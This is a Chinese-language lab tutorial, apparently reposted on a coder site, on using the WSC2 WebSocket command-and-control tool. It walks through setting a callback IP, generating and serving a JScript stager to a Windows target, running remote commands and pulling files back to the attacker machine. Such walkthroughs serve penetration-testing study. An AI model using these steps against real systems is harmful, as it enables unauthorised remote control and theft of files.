内容简介:这篇文章,我们将学习另一款C&C远控工具WebSocket C2,也被称为WSC2。介绍WSC2主要是一款后渗透测试工具。WSC2会使用WebSocket和一个浏览器进程。它的作用是在目标靶机上运行的客户端和实际充当C2服务器的控制器之间作为C2通信通道。这款工具使用Python开发的。
这篇文章,我们将学习另一款C&C远控工具WebSocket C2,也被称为WSC2。
介绍
WSC2主要是一款后渗透测试工具。WSC2会使用WebSocket和一个浏览器进程。它的作用是在目标靶机上运行的客户端和实际充当C2服务器的控制器之间作为C2通信通道。这款 工具 使用 Python 开发的。
本文演示环境
·攻击机:kali Linux
· 靶机:Windows 10
安装
首先,我们要在攻击机上安装此工具。我们可以直接从GitHub上下载该工具,下载命令如下:
git clone //github.com/Arno0x/WSC2.git
执行完上述命令之后,就会创建一个WSC2目录。现在我们cd到这个目录下,然后ls一下,查看我们刚才下载了什么内容,如下图:
cd WSC2/ ls
接下来,我们需要安装这个工具的依赖条件。安装依赖的方法有很多,这里我们直接使用pip命令,需要安装的依赖都在requirement.txt这个文件中,直接指定该文件安装即可:
pip install -r requirements.txt
刚才我们ls查看目录内容时,可以看到有一个config.py文件,我们需要修改这个文件,这样才能在我们的系统中获取到会话。我们使用nano来编辑文件,如图所示,当我们用nano打开config.py文件时,我们可以看到有一个CALLBACK变量,它的值是一个IP地址。这里我们需要把它修改成我们攻击机的IP地址,也就是这个例子中的kali的地址,如下图:
nano config.py
攻击目标
接下来,我们就可以运行这个工具了,在运行之前,我们要先检查一下是否具有执行权限。运行起来之后,我们会看到一个酷炫的banner信息,如下图所示,还有一些关于作者,版本和工具的详细信息。接着,它就会在当前目录下创建一个子incoming子目录,这个目录作为一个缓存使用,保存来自靶机的文件:
./wsc2.py
接下来,我们要创建一个batch文件。不过我们也可以使用其他类型的stager。这个工具提供的stager类型是jscript1,jscript2,jscript3。这里我们会使用jscript1,因为它不需要进行编译。其他的stager都需要进行编译。下面这条命令会在stagers目录下创建一个wsc2Agent1.js文件,如下图:
genStager jscript1
接下来,我们要把这个文件发送到靶机上。我们首先再打开一个终端,然后cd到stagers目录下。这里我们启用一个Python服务器,将文件分享靶机。当然了,也有很多其他方法可以将文件传到靶机上,大家可以自己多摸索,如下:
cd stagers/ ls python -m SimpleHTTPServer 80
一旦这个jscript文件在靶机中执行之后,我们就可以在终端中看到一条消息,一个新的agent连接成功。我们可以使用list命令来查看一下有哪些agents。
list
然后,我们复制这个AgentID,然后use这个AgentID与会话交互,如下图所示:
use [AgentID]
命令执行
我们输入cli命令,然后就可以在靶机上运行powershell命令。这里我们就简单地执行一个systeminfo命令,执行之后,我们就可以看到靶机的详细的系统信息了,如下图:
cli systeminfo
文件下载
除此之外,我们还可以从靶机上下载文件。下载文件的命令是getFile,后面接文件名或者路径。这个命令会将靶机上的文件下载到我们的攻击机上,如下图:
help getFile getFile sample_text.txt
下载的文件会保存在子目录incoming中,我们使用cat命令来查看下载文件的内容,如下图:
cd incoming/ ls cat sample_file.txt
以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网
猜你喜欢:- ENVI扩展工具:RandomForest分类工具
- 15大安全工具和下载黑客工具
- 版本管理工具及 Ruby 工具链环境
- [译]Go性能分析工具工具和手段
- 工具 | 一个在线生成 nginx 配置文件的开源工具
- 【工具分享】PxCook像素大厨——很好用的标记工具
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
Mastering JavaServer Faces
Bill Dudney、Jonathan Lehr、Bill Willis、LeRoy Mattingly / Wiley / 2004-6-7 / USD 40.00
Harness the power of JavaServer Faces to create your own server-side user interfaces for the Web This innovative book arms you with the tools to utilize JavaServer Faces (JSF), a new standard that wi......一起来看看 《Mastering JavaServer Faces》 这本书的介绍吧!